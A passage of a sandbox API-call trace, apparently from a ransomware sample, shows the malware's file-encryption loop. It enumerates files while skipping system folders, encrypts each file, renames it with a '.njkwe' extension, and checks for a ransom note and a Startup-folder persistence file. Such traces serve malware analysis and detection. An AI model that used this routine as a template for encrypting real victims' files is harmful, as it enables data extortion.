lpOverlapped=0x0) returned 1 [0077.277] CloseHandle (hObject=0x43c) returned 1 [0077.277] GetProcessHeap () returned 0xbe0000 [0077.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.277] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0077.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\1__connections_cellular_vodafone albania (albania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\1__Connections_Cellular_Vodafone Albania (Albania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\1__connections_cellular_vodafone albania (albania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.277] GetProcessHeap () returned 0xbe0000 [0077.277] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.277] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9077f3c5, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9077f3c5, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9077f3c5, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", cAlternateFileName="200__C~1.PRO")) returned 1 [0077.277] lstrcmpiW (lpString1="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.277] lstrcmpiW (lpString1="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.277] lstrcmpiW (lpString1="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.277] lstrcmpiW (lpString1="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.278] lstrcmpiW (lpString1="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.278] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml") returned 159 [0077.278] StrStrIW (lpFirst="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.278] lstrcmpW (lpString1="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.278] lstrcmpW (lpString1="200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.278] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\200__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.278] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\200__connections_cellular_asiacell (iraq)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.278] GetTickCount () returned 0x1153a75 [0077.278] GetTickCount () returned 0x1153a75 [0077.278] GetTickCount () returned 0x1153a75 [0077.278] GetTickCount () returned 0x1153a75 [0077.278] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.278] GetProcessHeap () returned 0xbe0000 [0077.278] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.278] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e1, lpOverlapped=0x0) returned 1 [0077.279] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.279] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e1, lpOverlapped=0x0) returned 1 [0077.279] GetProcessHeap () returned 0xbe0000 [0077.279] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.279] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.279] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.280] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.280] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.280] CloseHandle (hObject=0x43c) returned 1 [0077.280] GetProcessHeap () returned 0xbe0000 [0077.280] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.280] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\200__connections_cellular_asiacell (iraq)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\200__Connections_Cellular_AsiaCell (Iraq)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\200__connections_cellular_asiacell (iraq)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.281] GetProcessHeap () returned 0xbe0000 [0077.281] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.281] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9077f3c5, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9077f3c5, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9077f3c5, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x308, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", cAlternateFileName="201__C~1.PRO")) returned 1 [0077.281] lstrcmpiW (lpString1="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.281] lstrcmpiW (lpString1="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.281] lstrcmpiW (lpString1="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.281] lstrcmpiW (lpString1="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.281] lstrcmpiW (lpString1="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.281] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml") returned 163 [0077.281] StrStrIW (lpFirst="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.281] lstrcmpW (lpString1="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.281] lstrcmpW (lpString1="201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.281] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\201__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.281] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\201__connections_cellular_korektelecom (iraq)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.282] GetTickCount () returned 0x1153a85 [0077.282] GetTickCount () returned 0x1153a85 [0077.282] GetTickCount () returned 0x1153a85 [0077.282] GetTickCount () returned 0x1153a85 [0077.282] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.282] GetProcessHeap () returned 0xbe0000 [0077.282] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.282] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x308, lpOverlapped=0x0) returned 1 [0077.285] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.285] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x308, lpOverlapped=0x0) returned 1 [0077.285] GetProcessHeap () returned 0xbe0000 [0077.286] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.286] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.286] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.286] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.286] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.286] CloseHandle (hObject=0x43c) returned 1 [0077.286] GetProcessHeap () returned 0xbe0000 [0077.286] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.286] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\201__connections_cellular_korektelecom (iraq)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\201__Connections_Cellular_KorekTelecom (Iraq)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\201__connections_cellular_korektelecom (iraq)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.287] GetProcessHeap () returned 0xbe0000 [0077.287] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.287] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9077f3c5, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9077f3c5, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9077f3c5, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1dd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", cAlternateFileName="202__C~1.PRO")) returned 1 [0077.287] lstrcmpiW (lpString1="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.287] lstrcmpiW (lpString1="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.287] lstrcmpiW (lpString1="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.287] lstrcmpiW (lpString1="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.287] lstrcmpiW (lpString1="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.287] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml") returned 155 [0077.287] StrStrIW (lpFirst="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.287] lstrcmpW (lpString1="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.287] lstrcmpW (lpString1="202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.287] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\202__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.287] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\202__connections_cellular_zain (iraq)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.287] GetTickCount () returned 0x1153a85 [0077.287] GetTickCount () returned 0x1153a85 [0077.287] GetTickCount () returned 0x1153a85 [0077.287] GetTickCount () returned 0x1153a85 [0077.287] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.288] GetProcessHeap () returned 0xbe0000 [0077.288] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.288] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1dd, lpOverlapped=0x0) returned 1 [0077.288] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.289] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1dd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1dd, lpOverlapped=0x0) returned 1 [0077.289] GetProcessHeap () returned 0xbe0000 [0077.289] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.289] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.289] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.292] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.292] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.292] CloseHandle (hObject=0x43c) returned 1 [0077.292] GetProcessHeap () returned 0xbe0000 [0077.292] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.292] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 175 [0077.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\202__connections_cellular_zain (iraq)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\202__Connections_Cellular_Zain (Iraq)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\202__connections_cellular_zain (iraq)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.293] GetProcessHeap () returned 0xbe0000 [0077.293] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.293] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907a5631, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907a5631, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907a5631, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2be, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="203__C~1.PRO")) returned 1 [0077.293] lstrcmpiW (lpString1="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.293] lstrcmpiW (lpString1="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.293] lstrcmpiW (lpString1="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.293] lstrcmpiW (lpString1="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.293] lstrcmpiW (lpString1="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.293] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml") returned 155 [0077.293] StrStrIW (lpFirst="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.293] lstrcmpW (lpString1="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.293] lstrcmpW (lpString1="203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.293] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\203__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.293] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\203__connections_cellular_3 (ireland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.294] GetTickCount () returned 0x1153a85 [0077.294] GetTickCount () returned 0x1153a85 [0077.294] GetTickCount () returned 0x1153a85 [0077.294] GetTickCount () returned 0x1153a85 [0077.294] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.294] GetProcessHeap () returned 0xbe0000 [0077.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.294] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0077.299] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.299] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, 